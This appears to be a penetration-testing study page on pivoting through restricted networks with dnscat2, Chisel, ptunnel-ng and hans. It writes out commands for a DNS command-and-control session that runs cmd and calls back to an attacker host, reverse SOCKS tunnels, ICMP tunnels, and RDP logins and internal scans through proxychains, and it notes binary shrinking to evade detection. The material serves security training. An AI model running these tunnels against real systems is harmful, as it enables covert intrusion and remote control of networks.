Branching Out Our Tunnels

DNS Tunneling with Dnscat2

Dnscat2 is a tunneling tool that uses DNS protocol to send data between two hosts. It uses an encrypted Command-&-Control (C&C or C2) channel and sends data inside TXT records within the DNS protocol.

If dnscat2 is not already set up on our attack host, we can do so using the following commands:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
sudo gem install bundler
sudo bundle install

Starting the dnscat2 server

sudo ruby dnscat2.rb --dns host=<attackerIP>,port=53,domain=inlanefreight.local --no-cache

After running the server, it will provide us the secret key, which we will have to provide to our dnscat2 client on the Windows host so that it can authenticate and encrypt the data that is sent to our external dnscat2 server.

We can use the client with the dnscat2 project or use dnscat2-powershell, a dnscat2 compatible PowerShell-based client that we can run from Windows targets to establish a tunnel with our dnscat2 server

git clone https://github.com/lukebaggett/dnscat2-powershell.git

Once the dnscat2.ps1 file is on the target we can import it and run associated cmd-lets.

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver <attackerIP> -Domain inlanefreight.local -PreSharedSecret 0ec04a91cd1e963f8c03ca499d589d21 -Exec cmd

We must use the pre-shared secret (-PreSharedSecret) generated on the server to ensure our session is established and encrypted. If all steps are completed successfully, we will see a session established with our server.

We can list the options we have with dnscat2 by entering ? at the prompt.

Listing dnscat2 Options

dnscat2> ?

Here is a list of commands (use -h on any of them for additional help):
* echo
* help
* kill
* quit
* set
* start
* stop
* tunnels
* unset
* window
* windows

Interacting with the Established Session

window -i 1

SOCKS5 Tunneling with Chisel

Chisel is a TCP/UDP-based tunneling tool written in Go that uses HTTP to transport data that is secured using SSH.

Chisel can create a client-server tunnel connection in a firewall restricted environment.

Setting Up & Using Chisel

git clone https://github.com/jpillora/chisel.git
cd chisel
go build

If we want to mind the size of the binary we can follow IppSec's explanation of Chisel, building the binary and shrinking the size of the binary at the 24:29 mark of his video. This is sometimes useful to avoid detection.

Once the binary is built, we can use SCP to transfer it to the target pivot host.

scp chisel ubuntu@10.129.202.64:~/

Running the Chisel Server on the Pivot Host

./chisel server -v -p 1234 --socks5

The Chisel listener will listen for incoming connections on port 1234 using SOCKS5 (--socks5) and forward it to all the networks that are accessible from the pivot host.

We can start a client on our attack host and connect to the Chisel server.

Connecting to the Chisel Server

./chisel client -v <UbuntuIP>:1234 socks

Now we can modify our proxychains.conf file located at /etc/proxychains.conf and add 1080 port at the end so we can use proxychains to pivot using the created tunnel between the 1080 port and the SSH tunnel.

[ProxyList]
socks5 127.0.0.1 1080

Now if we use proxychains with RDP, we can connect to the DC on the internal network through the tunnel we have created to the Pivot host.

proxychains xfreerdp /v:<WindowsIP> /u:victor /p:pass@123

Chisel Reverse Pivot

there may be scenarios where firewall rules restrict inbound connections to our compromised target. In such cases, we can use Chisel with the reverse option.

We'll start the server in our attack host with the option --reverse.

Starting the Chisel Server on our Attack Host

sudo ./chisel server --reverse -v -p 1234 --socks5

Then we connect from the Ubuntu (pivot host) to our attack host, using the option R:socks

./chisel client -v <attackerIP>:1234 R:socks

Same proxychains config as above

[ProxyList]
socks5 127.0.0.1 1080
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123

Older versions of pre-compiled Chisel (in case you need old libc)

ICMP Tunneling with SOCKS

ICMP tunneling encapsulates your traffic within ICMP packets containing echo requests and responses. ICMP tunneling would only work when ping responses are permitted within a firewalled network.

We will use the ptunnel-ng tool to create a tunnel between our Ubuntu server and our attack host.

Once a tunnel is created, we will be able to proxy our traffic through the ptunnel-ng client. We can start the ptunnel-ng server on the target pivot host. Let's start by setting up ptunnel-ng.

Setting Up & Using ptunnel-ng

If ptunnel-ng is not on our attack host, we can clone the project using git.

git clone https://github.com/utoni/ptunnel-ng.git
cd ptunnel-ng
sudo ./autogen.sh

Alternative approach of building a static binary

sudo apt install automake autoconf -y
cd ptunnel-ng/
sed -i '$s/.*/LDFLAGS=-static "${NEW_WD}\/configure" --enable-static $@ \&\& make clean \&\& make -j${BUILDJOBS:-4} all/' autogen.sh
./autogen.sh

Transferring Ptunnel-ng to the Pivot Host

scp -r ptunnel-ng ubuntu@<UbuntuIP>:~/

Starting the ptunnel-ng Server on the Pivot Host

sudo ./ptunnel-ng -r<InterfaceIP> -R22

The IP address following -r should be the IP we want ptunnel-ng to accept connections on

Back on the attack host, we can attempt to connect to the ptunnel-ng server (-p <ipAddressofTarget>) but ensure this happens through local port 2222 (-l2222). Connecting through local port 2222 allows us to send traffic through the ICMP tunnel.

sudo ./ptunnel-ng -p<UbuntuIP> -l2222 -r<UbuntuIP> -R22

With the ptunnel-ng ICMP tunnel successfully established, we can attempt to connect to the target using SSH through local port 2222 (-p2222).

Tunneling an SSH connection through an ICMP Tunnel

ssh -p 2222 -l ubuntu 127.0.0.1

We may also use this tunnel and SSH to perform dynamic port forwarding to allow us to use proxychains in various ways.

ssh -D 9050 -p 2222 -l ubuntu 127.0.0.1

We could use proxychains with Nmap to scan targets on the internal network (172.16.5.x). Based on our discoveries, we can attempt to connect to the target.

proxychains nmap -sV -sT <WindowsIP> -p3389

Hans

https://github.com/friedrich/hans

https://github.com/albertzak/hanstunnel

Root is needed in both systems to create tun adapters and tunnel data between them using ICMP echo requests.

./hans -v -f -s 1.1.1.1 -p P@ssw0rd #Start listening (1.1.1.1 is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
ping 1.1.1.100 #After a successful connection, the victim will be in the 1.1.1.100
PreviousPivoting Around ObstaclesNextDouble Pivots

Last updated